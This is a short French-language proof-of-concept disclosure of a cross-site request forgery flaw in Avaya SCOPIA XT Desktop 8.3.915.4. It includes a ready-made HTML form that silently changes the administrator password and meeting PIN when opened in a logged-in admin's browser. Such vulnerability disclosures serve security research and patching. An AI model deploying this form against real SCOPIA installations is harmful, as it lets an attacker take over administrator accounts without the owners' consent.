
Preuve de concept démontrant une Cross-Site Request Forgery (CSRF) sur Avaya SCOPIA XT Desktop, permettant de changer le mot de passe administrateur sans jeton anti-CSRF.
Ce PoC décrit comment exploiter la faille de type Cross-Site Request Forgery (CSRF) sur SCOPIA XT Desktop version 8.3.915.4
site web : https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
La falsification de requête intersite, également connue sous le nom d'attaque en un clic ou de « session riding » et abrégée CSRF ou XSRF, est un type d'exploitation malveillante d'un site web dans lequel des commandes non autorisées sont transmises depuis un utilisateur auquel l'application web fait confiance.
Sur la page « Directory and Authentication », l'administrateur peut modifier son mot de passe.
En capturant la requête avec Burp Suite, j'ai constaté qu'un jeton anti-CSRF n'était pas implémenté et que le seul mécanisme de sécurité était le cookie de session.
6
J'ai créé ce fichier HTML qui a servi de PoC pour exploiter la vulnérabilité présentée.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
En l'exécutant dans le navigateur qui dispose d'un cookie valide pour l'environnement d'administration SCOPIA XT Desktop, il a été possible de modifier le mot de passe de l'utilisateur admin en « attacker » :
4
5